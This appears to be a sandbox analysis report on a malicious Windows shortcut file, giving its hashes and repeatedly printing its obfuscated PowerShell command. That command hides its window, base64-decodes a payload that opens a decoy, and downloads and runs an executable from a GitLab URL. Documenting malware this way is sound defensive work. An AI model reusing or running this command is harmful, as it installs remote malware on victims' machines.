Malicious

020af94fb45abb8f50b8a9167ab408c3

LNK File
|
MD5: 020af94fb45abb8f50b8a9167ab408c3
|
Size: 3.94 KB
|
application/x-ms-shortcut

Infection Chain

Summary by MalvaGPT

Characteristics

Hash	Hash Value
MD5	020af94fb45abb8f50b8a9167ab408c3
Sha1	716372e9b04acb364f615df4c796b7e8886cf414
Sha256	1a2c595d6107450c9bcb1f204b2791dc610565399511f9fb34975222fb53570a
Sha384	c38349ea8747d58bac61ee11e91dfd94535472fa91769a561993ccc63db2bcbd884cfef0876dc5c09b06273791c6a9ec
Sha512	befecae14a6dec9d996a53d154a6819a38ade8ee7b9b248453233d783f56e8643530118caebbcd7085ce1588eee5ce981570340c754ad7283fb7833ee4ed035e
SSDeep	48:8gK461qZHiVXzQ1+xIG7avIKQjqW0OHALKl21tmw2fMIpfvU3Nx:8gl61qBgEtGVWW0OHALKl2+w2k
TLSH	4581CC1117EA021DE9B3AA366DFAB5519673FC26B9318A9E11CD020D0B33500EE21F3F

File Structure

Artefacts

Name0	Value
LNK: Command Execution	powershell.exe -WindowStyle hidden -NoExit -Command "$UMLKW7 = 'cVDnCbIvOjYgyYmRQTTA4Y0lJVjY0TFNldC1Db250ZW50ICRlbnY6VEVNUFxPSCAnUmV2aWV3JztbTWF0aF06OlBvdygxMCwgMjMpO1tNYXRoXTo6UG93KDEwLCAyMyk7U3RhcnQtUHJvY2VzcyAkZW52OlRFTVBcT0g7aXdyIC1VcmkgaHR0cHM6Ly9naXRsYWIuY29tLy0vcHJvamVjdC83NTk2MzE1My91cGxvYWRzL2NjZjA0NTg3MTRkNzBlYTk0NWM1MzQyZmRkZmE4MWM1L2Vzdi5leGUgLU91dEZpbGUgJGVudjpURU1QXDJMTzFNZXN2LmV4ZTtTdGFydC1Qcm9jZXNzICRlbnY6VEVNUFwyTE8xTWVzdi5leGU7RXhpdA==';$E0LO9IB = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($UMLKW7.Substring(13)));[Math]::Pow(14, 14);[Math]::Pow(14, 14);[Math]::Pow(14, 14);[Math]::Pow(14, 14);Invoke-Expression -Command $E0LO9IB.Substring(13);Exit"
Deobfuscated PowerShell	-windowstyle "hidden" -NoExit -Command "$UMLKW7 = 'cVDnCbIvOjYgyYmRQTTA4Y0lJVjY0TFNldC1Db250ZW50ICRlbnY6VEVNUFxPSCAnUmV2aWV3JztbTWF0aF06OlBvdygxMCwgMjMpO1tNYXRoXTo6UG93KDEwLCAyMyk7U3RhcnQtUHJvY2VzcyAkZW52OlRFTVBcT0g7aXdyIC1VcmkgaHR0cHM6Ly9naXRsYWIuY29tLy0vcHJvamVjdC83NTk2MzE1My91cGxvYWRzL2NjZjA0NTg3MTRkNzBlYTk0NWM1MzQyZmRkZmE4MWM1L2Vzdi5leGUgLU91dEZpbGUgJGVudjpURU1QXDJMTzFNZXN2LmV4ZTtTdGFydC1Qcm9jZXNzICRlbnY6VEVNUFwyTE8xTWVzdi5leGU7RXhpdA==';$E0LO9IB = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($UMLKW7.Substring(13)));[Math]::Pow(14, 14);[Math]::Pow(14, 14);[Math]::Pow(14, 14);[Math]::Pow(14, 14);Invoke-Expression -Command $E0LO9IB.Substring(13);Exit"
Deobfuscated PowerShell	-windowstyle "hidden" -NoExit -Command "$UMLKW7 = 'cVDnCbIvOjYgyYmRQTTA4Y0lJVjY0TFNldC1Db250ZW50ICRlbnY6VEVNUFxPSCAnUmV2aWV3JztbTWF0aF06OlBvdygxMCwgMjMpO1tNYXRoXTo6UG93KDEwLCAyMyk7U3RhcnQtUHJvY2VzcyAkZW52OlRFTVBcT0g7aXdyIC1VcmkgaHR0cHM6Ly9naXRsYWIuY29tLy0vcHJvamVjdC83NTk2MzE1My91cGxvYWRzL2NjZjA0NTg3MTRkNzBlYTk0NWM1MzQyZmRkZmE4MWM1L2Vzdi5leGUgLU91dEZpbGUgJGVudjpURU1QXDJMTzFNZXN2LmV4ZTtTdGFydC1Qcm9jZXNzICRlbnY6VEVNUFwyTE8xTWVzdi5leGU7RXhpdA==';$E0LO9IB = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($UMLKW7.Substring(13)));[Math]::Pow(14, 14);[Math]::Pow(14, 14);[Math]::Pow(14, 14);[Math]::Pow(14, 14);Invoke-Expression -Command $E0LO9IB.Substring(13);Exit"

020af94fb45abb8f50b8a9167ab408c3 (3.94 KB)

File Structure

Characteristics

No malware configuration were found at this point.

Artefacts

Name0	Value	Location
LNK: Command Execution	powershell.exe -WindowStyle hidden -NoExit -Command "$UMLKW7 = 'cVDnCbIvOjYgyYmRQTTA4Y0lJVjY0TFNldC1Db250ZW50ICRlbnY6VEVNUFxPSCAnUmV2aWV3JztbTWF0aF06OlBvdygxMCwgMjMpO1tNYXRoXTo6UG93KDEwLCAyMyk7U3RhcnQtUHJvY2VzcyAkZW52OlRFTVBcT0g7aXdyIC1VcmkgaHR0cHM6Ly9naXRsYWIuY29tLy0vcHJvamVjdC83NTk2MzE1My91cGxvYWRzL2NjZjA0NTg3MTRkNzBlYTk0NWM1MzQyZmRkZmE4MWM1L2Vzdi5leGUgLU91dEZpbGUgJGVudjpURU1QXDJMTzFNZXN2LmV4ZTtTdGFydC1Qcm9jZXNzICRlbnY6VEVNUFwyTE8xTWVzdi5leGU7RXhpdA==';$E0LO9IB = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($UMLKW7.Substring(13)));[Math]::Pow(14, 14);[Math]::Pow(14, 14);[Math]::Pow(14, 14);[Math]::Pow(14, 14);Invoke-Expression -Command $E0LO9IB.Substring(13);Exit" Malicious	020af94fb45abb8f50b8a9167ab408c3
Deobfuscated PowerShell	-windowstyle "hidden" -NoExit -Command "$UMLKW7 = 'cVDnCbIvOjYgyYmRQTTA4Y0lJVjY0TFNldC1Db250ZW50ICRlbnY6VEVNUFxPSCAnUmV2aWV3JztbTWF0aF06OlBvdygxMCwgMjMpO1tNYXRoXTo6UG93KDEwLCAyMyk7U3RhcnQtUHJvY2VzcyAkZW52OlRFTVBcT0g7aXdyIC1VcmkgaHR0cHM6Ly9naXRsYWIuY29tLy0vcHJvamVjdC83NTk2MzE1My91cGxvYWRzL2NjZjA0NTg3MTRkNzBlYTk0NWM1MzQyZmRkZmE4MWM1L2Vzdi5leGUgLU91dEZpbGUgJGVudjpURU1QXDJMTzFNZXN2LmV4ZTtTdGFydC1Qcm9jZXNzICRlbnY6VEVNUFwyTE8xTWVzdi5leGU7RXhpdA==';$E0LO9IB = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($UMLKW7.Substring(13)));[Math]::Pow(14, 14);[Math]::Pow(14, 14);[Math]::Pow(14, 14);[Math]::Pow(14, 14);Invoke-Expression -Command $E0LO9IB.Substring(13);Exit" Malicious	020af94fb45abb8f50b8a9167ab408c3 > LNK CommandLine
Deobfuscated PowerShell	-windowstyle "hidden" -NoExit -Command "$UMLKW7 = 'cVDnCbIvOjYgyYmRQTTA4Y0lJVjY0TFNldC1Db250ZW50ICRlbnY6VEVNUFxPSCAnUmV2aWV3JztbTWF0aF06OlBvdygxMCwgMjMpO1tNYXRoXTo6UG93KDEwLCAyMyk7U3RhcnQtUHJvY2VzcyAkZW52OlRFTVBcT0g7aXdyIC1VcmkgaHR0cHM6Ly9naXRsYWIuY29tLy0vcHJvamVjdC83NTk2MzE1My91cGxvYWRzL2NjZjA0NTg3MTRkNzBlYTk0NWM1MzQyZmRkZmE4MWM1L2Vzdi5leGUgLU91dEZpbGUgJGVudjpURU1QXDJMTzFNZXN2LmV4ZTtTdGFydC1Qcm9jZXNzICRlbnY6VEVNUFwyTE8xTWVzdi5leGU7RXhpdA==';$E0LO9IB = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($UMLKW7.Substring(13)));[Math]::Pow(14, 14);[Math]::Pow(14, 14);[Math]::Pow(14, 14);[Math]::Pow(14, 14);Invoke-Expression -Command $E0LO9IB.Substring(13);Exit" Malicious	020af94fb45abb8f50b8a9167ab408c3 > LNK CommandLine > [Deobfuscated PS]

You must be signed in to post a comment.

An error has occurred. This application may no longer respond until reloaded. Reload 🗙